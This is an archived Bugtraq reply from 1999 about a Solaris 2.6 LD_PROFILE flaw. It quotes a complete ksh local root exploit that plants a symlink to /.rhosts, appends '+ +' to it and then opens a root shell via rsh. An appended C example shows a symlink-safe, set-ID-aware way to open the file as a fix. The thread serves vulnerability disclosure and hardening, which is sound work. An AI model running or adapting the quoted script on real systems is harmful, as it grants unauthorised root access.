Bugtraq mailing list archives

Re: LD_PROFILE local root exploit for solaris 2.6


From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Sat, 25 Sep 1999 02:25:52 +0200


On Wed, 22 Sep 1999, Steve Mynott wrote:

> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> #  LD_PROFILE local root exploit for solaris
> #  steve () tightrope demon co uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + >  /.rhosts
> rsh -l root localhost csh -i

Old news. I discovered this problem and informed Sun about it in
June 1998. I cannot verify it right now but I think they have already made
a patch for it.

GNU libc 2.something used to be affected as well. The odds are other
platforms having this particular nifty feature (if they exist at all) are
still vulnerable because I forgot to tell Bugtraq about it.
Oh, mea culpa! :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
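
The quoted script relies on a privileged program honouring LD_PROFILE and creating its output file in /var/tmp through a pre-placed symlink, with the mode left to the caller's umask. As an added example (not code from this thread, from Sun's patch, or from any runtime linker), the C below contrasts that open pattern with a hardened one; `naive_open`, `hardened_open`, `run_demo` and the temp-dir file names are hypothetical and constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700   /* for mkdtemp, symlink, O_NOFOLLOW under strict -std */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* "Before": create-or-open, follows symlinks, mode left to the caller's umask. */
int naive_open(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0666);
}

/* "After": no profiling output for set-ID processes, never follow or reuse an
 * existing name, and request 0600 so that umask 000 cannot widen the mode. */
int hardened_open(const char *path, int set_id) {
    if (set_id) { errno = EPERM; return -1; }
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private temp dir: symlink -> not-yet-existing target.
 * Returns bit 0 if naive_open created a world-writable target via the link,
 * bit 1 if hardened_open refused the link and created nothing,
 * bit 2 if hardened_open refused a set-ID caller on an unused path. */
int run_demo(void) {
    char dir[] = "/tmp/ldprof-demo-XXXXXX", lnk[64], target[64], clean[64];
    struct stat st;
    int fd, result = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(lnk, sizeof lnk, "%s/ps.profile", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(clean, sizeof clean, "%s/clean.profile", dir);
    if (symlink(target, lnk) != 0) return -1;
    mode_t old = umask(0);                       /* same umask as the quoted script */
    fd = naive_open(lnk);
    if (fd >= 0 && stat(target, &st) == 0 && (st.st_mode & 0002)) result |= 1;
    if (fd >= 0) close(fd);
    unlink(target);                              /* reset: the link dangles again */
    fd = hardened_open(lnk, 0);
    if (fd < 0 && stat(target, &st) != 0) result |= 2;
    if (fd >= 0) close(fd);
    fd = hardened_open(clean, 1);                /* always refused: set_id is true */
    if (fd < 0 && errno == EPERM && stat(clean, &st) != 0) result |= 4;
    umask(old);
    unlink(clean); unlink(target); unlink(lnk); rmdir(dir);
    return result;
}

int main(void) { printf("result=%d (7 means all three checks held)\n", run_demo()); return 0; }
```
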

